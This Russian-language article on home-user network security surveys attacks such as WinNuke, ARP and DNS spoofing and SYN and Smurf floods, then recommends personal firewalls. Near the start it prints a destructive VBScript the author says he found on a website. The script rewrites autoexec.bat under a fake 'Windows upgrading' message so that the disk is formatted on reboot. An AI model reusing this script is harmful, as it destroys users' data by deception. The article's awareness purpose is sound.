Защити себя сам!!!

На войне как на войне…
***
Перед началом просмотра публикации настоятельно рекомендую начинающим пользователям прочесть словарь терминов:
DNS (Domain Name System — система имен доменов) Распределенный механизм имен/адресов, используемых в сети Internet. Используется для
разрешения логических имен в IP-адреса. DNS используется в сети Internet, обеспечивая возможность работы с понятными и легко
запоминающимися именами вместо неудобоваримых чисел IP-адреса.
Domain (домен) В сети Internet часть иерархии имен. Синтаксически доменное имя Internet содержит последовательность имен (меток), разделенных точками (.) например, «fdd5-25.narod.ru» В OSI термин домен используется как административное деление сложных распределенных систем, как в MHS Private Management Domain (PRMD) и
Directory Management Domain (DMD).
ICMP: Internet Control Message Protocol. Протокол, используемый для
контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP.
TCP: Transmission Control Protocol. Основной транспортный протокол в наборе протоколов Internet, обеспечивающий надежные, ориентированные на соединения, полнодуплексные потоки.
TCP/IP (Transmission Control Protocol/Internet Protocol — протокол управления передачей/протокол Internet) Известен также как стек протоколов Internet (Internet Protocol Suite). Данный стек протоколов используется в семействе сетей Internet и для объединения гетерогенных сетей.
Ping: Packet internet groper. Программа, используемая для проверки доступности адресата путем передачи ему специального сигнала (ICMP echo request — запрос отклика ICMP) и ожидания ответа. Термин используется как глагол: «Ping host X to see if it is up!»
Port (порт) Абстракция, используемая транспортными протоколами Internet для обозначения многочисленных одновременных соединений с единственным хостом — адресатом. Физический интерфейс компьютера, мультиплексора и т.п. для подключения терминала или модема.
FTP: File Transfer Protocol. Используемый в Internet протокол (и программа) передачи файлов между хост — компьютерами.
Telnet Протокол виртуального терминала в наборе протоколов Internet. Позволяет пользователям одного хоста подключаться к
другому удаленному хосту и работать с ним как через обычный терминал.
UDP (User Datagram Protocol) Прозрачный протокол в группе протоколов Internet. UDP, подобно TCP, использует IP для доставки; однако, в отличие от TCP, UDP обеспечивает обмен дейтаграммами без
подтверждения гарантий доставки.
***
Каждый пользователь проводящий в интернете много времени может стать потенциальной жертвой сетевой атаки. В чём она может выражаться? Да в чём угодно, от доступа к ресурсам вашего компьютера, до банального отсоединения от провайдера. Причём, в последние время подобные случаи участились на столько, что настал момент когда об этом нужно написать. Я не хочу начинать публикацию с пустого описания программ для защиты в интернет. Ведь программы пишутся под конкретную проблему. И наверное, просто следует написать про то, что и как может вызвать поражение пользователя или сервера в сети. Первое на чём бы я хотел заострить ваше внимание, так это на довольно необычной угрозе для ваших жёстких дисков. Это вредоносные скрипты, которые могут находится на любом сайте.

script language ="VBScript"
sub Reboot
Set
Shell=CreateObject("WScript.Shell")
Shell.Run "Rundll32.exe
User.exe,ExitWindows"
RunDll
end sub
sub
destruct
set fs=createobject("Scripting.FileSystemObject")'FileSystem
if
fs.fileexists("c:\autoexec.bat") then
set
ab=fs.getfile("c:\autoexec.bat")
ab.attributes=0
end if
set
autoexec=fs.CreateTextFile("c:\autoexec.bat")
autoexec.WriteLine
"@cls"
autoexec.WriteLine "@echo Windows upgrading your system..."
autoexec.WriteLine "@echo Do not abort this process!"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.close
end sub
destruct
format
reboot

Только видимо неудачный, поскольку мне удалось его выловить с одной занимательной страницы. На которой-то он и лежал, дабы отформатировать мой жёсткий диск. Но к счастью выдал, что у него ошибка в третьей строке. Однажды даже попался немного другой экземпляр, который вписывал себя в автозагрузку WINDOWS и вешал компьютер намертво. Поэтому прошу, не повторяйте моей ошибки посещая сомнительные сайты предложенные вам в чате или в очередном спаме. Развивая тему нельзя не затронуть возможные методы обнаружения злоумышленником вашего компьютера в сети интернет. Пока вы думаете читать ли это дальше, хочу поведать одну жизненную историю. Есть у меня знакомый администратор компьютерного клуба. Где есть выделенный канал. И вот долгими ночами вместо того как играть со всеми в COUNTER STRIKE, он сидит с программой «IP сканер» и ищет пользователей которые на данный момент в сети. Потом уже с помощью другой утилиты сканирует порты. Ports scan. Сканирование компьютерной системы на наличие портов, путем попыток их открытия. Эта атака сильно расходует ресурсы системы. Обычно она используется для поиска слабых мест <дырок> в «ПО», «ОС» компьютера и предшествует более элегантной атаке. К чему я всё это рассказываю? Поймёте прочитав всё ниженаписанное. Любимое оружие всех сетевых сумасбродов это Win Nuke. Hаpяду с обычными данными пересылаемыми по TCP соединению
стандарт предусматривает также передачу срочных (Out Of Band)
данных. У большинства PC с установленным Windows присутствует сетевой протокол Net BIOS, который использует для своих нужд 3 IP порта: 137, 138, 139. Как выяснилось, если соединиться с Windows машиной в 139 порт и послать туда несколько байт Out Of Band данных, то NetBIOS не зная что делать с этими данными попросту подвешивает или перезагружает машину. Для Windows 95 это обычно выглядит как синий текстовый экpан, сообщающий об ошибке в драйвере TCP/IP и невозможность работы с сетью до перезагрузки ОC. NT 4.0 без сервис паков перезагружается, NT 4.0 со вторым сервис паком выпадает в синий экран. Что же касается WINDOWS 98 SE (пропатченная версия). Думаю, стоит быть спокойным. Проведя тест у себя в локальной сети (12 компьютеров), я выяснил, что не один из 18 нюкеров не произвёл никакого воздействия на машины. Хотя не исключено, что старая дыра давно используется в новых, ещё более коварных целях. Чаще всего жертвой NUKE атаки можно стать в обычном web чате. Конечно, нельзя обойти вниманием и другой тип нюков — ICMP: Internet Control Message Protocol. Протокол, используемый для контроля за ошибками и сообщениями на уровне IP. В действительности ICMP представляет собой часть протокола IP. Суть атаки такая же как и у стандартного NUKE. На компьютер жертвы высылается сообщения об ошибках и компьютер виснет намертво. Что же касается чатов — IRC. Puke. Осуществляется посылка злоумышленником атакуемому хосту пакета ICMP unreachable error (неизвестная ошибка удаленной системы), что в свою очередь вызывает отключение Хоста от сервера (обычно IRC). Сейчас шла речь, на мой взгляд, о более распространённых методах атак на обычного пользователя. Но не стоит упускать из виду и атаки на сервера. Ведь от стабильности оных может зависеть работа сотен людей!
Угроза для серверов это и угроза пользователям.
Есть такая вещь Dummy ARP server. В сети Internet каждый пользователь имеет уникальный IP адрес, на который поступают все сообщения из глобальной сети. Однако протокол IP это не столько сетевой, сколько межсетевой протокол обмена, предназначенный для связи между объектами в глобальной сети. На канальном уровне пакеты адресуются по аппаратным адресам сетевых карт. В сети Internet для взаимно однозначного соответствия IP и Ethernet адресов используется Address Resolution Protocol. Первоначально хост может не иметь информации о Ethernet — адресах других пользователей, находящихся с ним в одном сегменте, в том числе и о Ethernet — адресе маршрутизатора. Соответственно, при первом обращении к сетевым ресурсам хост отправляет широковещательный ARP-запрос, который получат все станции в данном сегменте сети. Получив данный запрос, маршрутизатор отправляет на запросивший хост ARP-ответ, в котором сообщает свой Ethernet-адрес. Данная схема работы позволяет злоумышленнику послать ложный ARP-ответ, в котором объявить себя искомым хостом, (например, маршрутизатором), и, в дальнейшем, активно контролировать весь сетевой трафик «обманутого» хоста. Проще говоря получать все ваши данные. Но это ещё не всё, что может приключиться с нами, пока мы спим.
Dummy DNS. Внедрение в сеть Internet ложного DNS-сервера путем перехвата DNS-запроса. Для реализации атаки злоумышленнику необходимо перехватить DNS-запрос, извлечь из него номер UDP-порта отправителя запроса, двухбайтовое значение ID идентификатора DNS-запроса и искомое имя и, затем, послать ложный DNS-ответ на извлеченный из DNS-запроса UDP-порт, в котором указать в качестве искомого IP-адреса настоящий IP-адрес ложного DNS-сервера. Это позволит в дальнейшем полностью перехватить и активно воздействовать на информацию, циркулирующую между «обманутым» хостом и сервером. Необходимым условием осуществления данного варианта атаки является перехват DNS-запроса. Это возможно только в том случае, если атакующий находится либо на пути основного трафика, либо в сегменте настоящего DNS-сервера. Выполнение одного из этих условий местонахождения хакера в сети делает подобную удаленную атаку трудно осуществимой на практике (попасть в сегмент DNS-сервера и тем более в межсегментный канал связи атакующему скорее всего не удастся). Однако в случае выполнения этих условий возможно осуществить межсегментную удаленную атаку на сеть Internet, что вообще-то нежелательно.
IP Hijacking. Необходимым условием является доступ к машине, находящейся на пути сетевого потока. Напомним, что при передаче данных постоянно используются оба поля находящиеся в IP-заголовке. Исходя из их значения, сервер и клиент проверяют корректность передачи пакетов. Существует возможность ввести соединение в «десинхронизированное состояние». Это когда присылаемые сервером данные не будут совпадать с ожидаемым значениями клиента, и наоборот. В данном случае злоумышленник, «прослушивая» линию, может взять на себя функции посредника, генерируя корректные пакеты для клиента и сервера и перехватывая их ответы. Метод позволяет полностью обойти такие системы защиты, как, например, одноразовые пароли, поскольку злоумышленник начинает работу уже после того, как произойдет авторизация пользователя. UDP storm. Как правило, по умолчанию системы поддерживают работу таких UDP-портов, как 7 («эхо», полученный пакет отсылается назад), 19 («знакогенератор», в ответ на полученный пакет отправителю высылается строка знакогенератора) и других. В данном случае хакер может послать единственный UDP-пакет, где в качестве исходного порта будет указан 7, в качестве получателя — 19-й, а в качестве адреса получателя и отправителя будут указаны, к примеру, две машины вашей сети (или даже 127.0.0.1). Получив пакет, 19-й порт отвечает строкой, которая попадает на порт 7. Седьмой порт дублирует ее и вновь отсылает на 19 и так до бесконечности. Бесконечный цикл съедает ресурсы машин и добавляет на канал бессмысленную нагрузку. Конечно, при первом потерянном UDP-пакете буря прекратиться. Traffic analysis (sniffing) Прослушивание канала. Практически все сетевые карты поддерживают возможность перехвата пакетов, передаваемых по общему каналу локальной сети. При этом рабочая станция может принимать пакеты, адресованные другим компьютерам того же сегмента сети. Таким образом, весь информационный обмен в сегменте сети становится доступным хакеру, что поможет в дальнейшем ему подобрать/придумать другие типы атак против Вас. Для успешной реализации этой атаки компьютер злоумышленника должен располагаться в том же сегменте локальной сети, что и атакуемый компьютер. Атака Brute Force «Грубая сила», используется хакерами в тех случаях, когда доступ к системе либо информации закрыт паролем, а уязвимостей не удалось обнаружить. Осуществляется простым перебором всех возможных либо наиболее часто встречающихся паролей. Во втором случае brute force достаточно часто называют «атакой по словарю». Fuzzy. Пакет IP содержит поле, определяющее какой протокол следующего уровня(TCP, UDP, ICMP) использует данные из Internet. Хакеры могут использовать нестандартное значение данного поля для передачи данных, которые не будут фиксироваться стандартными средствами контроля информационных потоков.
Denial of service (DOS)
Класс атак, приводящих к отказу в обслуживании. Во время таких атак происходит повышенный расход ресурсов процессора и уменьшение канала пропускной возможности связи, что может привести к сильному замедлению работы всей компьютерной системы, отдельных задач, либо вообще к полной остановке пользователя. К DOS атакам относятся Floods, ICMP flooding, Identification flooding и другие. Изначально оговорюсь, что многое нижеописанное истинно для серверов.
1. Floods. Перевод с английского на русский — «затопление». Во время floods атак происходит посылка большого количества на атакуемую систему ICMP (чаще всего) либо UDP пакетов, которые не несут полезной информации (мусор). В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших бесполезных пакетов и генерацией на них ответов.
2. SYN flooding. Затопление SYN-пакетами — самый известный способ «забить» информационный канал. Затопление SYN пакетами основано на переполнении очереди сервера, после чего сервер перестает отвечать на запросы пользователей. В различных системах работа с очередью реализована по разному. После истечения некоторого времени (зависит от реализации) система удаляет запросы из очереди. Однако ничего не мешает хакеру послать новую порцию запросов. Таким образом, даже находясь на соединение 2400 bps, злоумышленник может посылать каждые полторы минуты по 20-30 пакетов на сервер, поддерживая его в нерабочем состоянии. Атака обычно направлена на определённую, конкретную службу, например telnet или ftp. Она заключается в передаче пакетов установления соединения на порт, соответствующий атакуемой службе. При получении запроса система выделяет ресурсы для нового соединения, после чего пытается ответить на запрос (послать «SYN-ACK») по недоступному адресу. По умолчанию NT версий 3.5-4.0 будет пытаться повторить подтверждение 5 раз — через 3, 6, 12, 24 и 48 секунд. После этого еще 96 секунд система может ожидать ответ, и только после этого освободит ресурсы, выделенные для будущего соединения. Общее время занятости ресурсов — 189 секунд.
3. ICMP flooding (flood ping). Перевод с английского на русский — «поток пингов». Во время этой атаки происходит посылка компьютерной системе жертвы большого количества запросов ICMP. В результате происходит уменьшение полосы пропускания канала и загрузка компьютерной системы анализом пришедших пакетов и генерацией на них ответов. Примечание: В мирных целях пинг используется администраторами и пользователями для проверки работоспособности основных частей транспортной системы вычислительной сети, оценить работу сети при максимальной нагрузке. При стандартном режиме работы пакеты высылаются через некоторые промежутки времени, практически не нагружая сеть.
4. DNS flooding, DNS scan. Эта атака, направленная на сервера имён Internet. Она заключается в передаче большого числа DNS запросов и приводит к тому, что у пользователей нет возможности обращаться к сервису имен и,
следовательно, обеспечивается невозможность работы обычных пользователей. DNS scan. Известно, что прежде чем начинать атаку, хакеры осуществляют выявление целей, т.е. выявление компьютеров, которые будут жертвами атаки, а также компьютеров, которые осуществляют информационный обмен с жертвами. Одним из способов выявления целей заключается в опросе сервера имён и получение от него всей имеющейся информации о домене.
5. Unreachable (dest_unreach, ICMP type 3). Эта атака заключается в том, что компьютерной системе посылается сообщение ICMP type 3, которое сообщает, что порт назначения недоступен тем самым обманывая систему и вынуждая ее разорвать соединение т.к. она будет «думать» что пакеты не доходят. ICMP туре 3 может посылаться клиентской машине, которая затем произведет отключение, либо посылаться серверу и инициатором отключения станет он. Посылку ICMP туре 3 осуществляет хакер.
6. UDP bomb. Передаваемый пакет UDP содержит неправильный формат служебных полей. Некоторые старые версии сетевого ПО приводят при получении подобного пакета к аварийному завершению системы.
7.Smurf. Атака заключается в передаче в сеть широковещательных ICMP запросов от имени компьютера-жертвы. В результате компьютеры, принявшие такие широковещательные пакеты, отвечают компьютеру-жертве, что приводит к существенному снижение пропускной способности канала связи и, в ряде случаев, к полной изоляции атакуемой сети. Атака smurf исключительно эффективна и широко распространена.
8. Pong Floods — атаки, перечисленные выше, но в качестве обратного действительного IP-адреса отправителя используется поддельный. Тем сам затрудняется обнаружение хакера.
Конечно, тяжело решить проблему безопасности в сети. Но можно попробовать. Я хочу рассказать про то, как может себя защитить обычный пользователь. Ведь по статистике именно его компьютер чаще всего становиться жертвой. Для обороны нашего с вами здоровья, давно разработаны средства «индивидуальной защиты». К ним относятся программы FIREWALL (огненная стена). FIREWALL-ы бывают разными, как для домашнего пользования (TINY PERSONAL FIREWALL, BLACK ICE), так и для корпоративного. Предприятия сами разберутся, что им делать. А вот обычный неискушённый пользователь не всегда. Хочу предложить вашему вниманию на мой взгляд самых удачных представителей «огненных стен» . Все они были мною испытаны в разное время, в разных частях интернет. Outpost Firewall (www.agnitum.com) — стал классикой пару лет назад. С тех пор не теряет своих позиций на рынке. Был создан специально для новичков, не требуя много времени на изучение своих настроек и возможностей. В то же время продвинутые пользователи нашли в программе много полезных возможностей, что позволяет создать изощренные настройки для защиты своего компьютера или сети. Уровень Outpost Firewall был высоко оценен крупнейшими отечественными изданиями, такими как «Компьютер-Пресс», «Софтерра», «Хакер», «Компьютерная Газета». Но в бочке мёда нельзя не обойтись ложкой дёгтя. В процессе работы было замечено, что компьютеры на базе процессоров AMD 450, 1600 XP под управлением системы WINDOWS 98 SE частенько после использования этой программы вешались при выключении компьютера. Конечно, я не настаиваю на все 100%, что это вызывает FIREWALL, но такие проблемы случались очень часто. И это наводит на некоторые размышления. Тем не менее это не помешало программе защитить меня пару раз в чате от NUKE атаки. Её пытались провести на компьютер. Кстати, второй эпизод знакомства с Outpost случился намного позже ещё в одном чате. На сей раз FIREWALL выдал, что был запущен ICMP фраг. В обеих случаях мой компьютер не пострадал. Это и является самой лучшей характеристикой программы. Второй продукт, который считается одним из лидеров в своей области называется Norton Personal Firewall или ещё одна его разновидность Norton Internet Security (www.symantec.com).
Norton Internet Security специально предназначена для защиты вас и вашей семьи от опасностей которые подстерегают в Internet. Основные его возможности : Закрывает доступ в Internet детям, автоматически преграждает путь вирусам и другому вредному коду. Что очень удачно подходит для борьбы со скриптовыми вирусами, описанными чуть выше. Защищает ваш компьютер как от атак из вне, так и от программ троянов, которые могут попытаться вырваться в сеть с украденной информацией.
Вообще-то программ подобного рода очень и очень много. И для описания хотя бы десятка их потребовалась не одна журнальная страница. Именно по этому в окончании публикации я хочу привести отрывок одного текста (переведённого с английского), который был написан для программы Black Ice (FIREWALL) ещё в 1999 году.
«Большинство хакеров являются неопытными детьми желающими пошутить. Они просто хотят порисоваться перед своими друзьями, что они могут взломать систему. К несчастью, даже неопытный взломщик может вызвать серьезный ущерб войдя в вашу сеть. Корпорации давно узнали о рисках для их бизнеса вызванного хакерами. Тем не менее, большинство министерств внутренних дел и пользователей — не подозревают, что хакеры могут сделать. Они могут сделать ваш компьютерный полностью непригодным к работе. Хакеры могут украсть или удалить важные данные. Находчивый взломщик может вызвать огромный финансовый ущерб, компаниям которые каждый, используют Internet. В 1997 комиссия Сената США, Роберта S. Litt, Deputy (ассистента Министра Юстиции) установила. Компьютерные преступление обходятся от $500 миллионов до $10 миллиардов долларов за год. Институт компьютерной безопасности опросил 428 специалистов информационной безопасности в компаниях. 42% респондентов указало, что происходило несанкционированное использование их компьютерных систем в течение прошлого года. И всё из-за отсутствия централизованного управления или недостаточного финансирования.» Напомню ещё раз, что такая ситуация была в 1997 году. С тех пор многое изменилось. Но одна вещь осталось незыблемой. На безопасности экономить нельзя!

При создании публикации были использованы материалы с сайта
http://kiev-security.org.ua

Роман Карпач